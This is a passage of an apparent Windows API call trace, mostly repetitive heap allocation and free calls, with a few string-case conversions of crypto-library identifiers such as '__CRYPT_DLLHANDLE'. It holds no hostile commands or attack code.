Flags=0x0, Size=0x20) returned 0x8debf0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.767] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0171.768] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0171.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.768] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0171.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0171.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0171.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0171.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.769] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0171.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.770] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0171.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.771] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0171.772] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0171.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.773] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.773] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0171.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0171.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 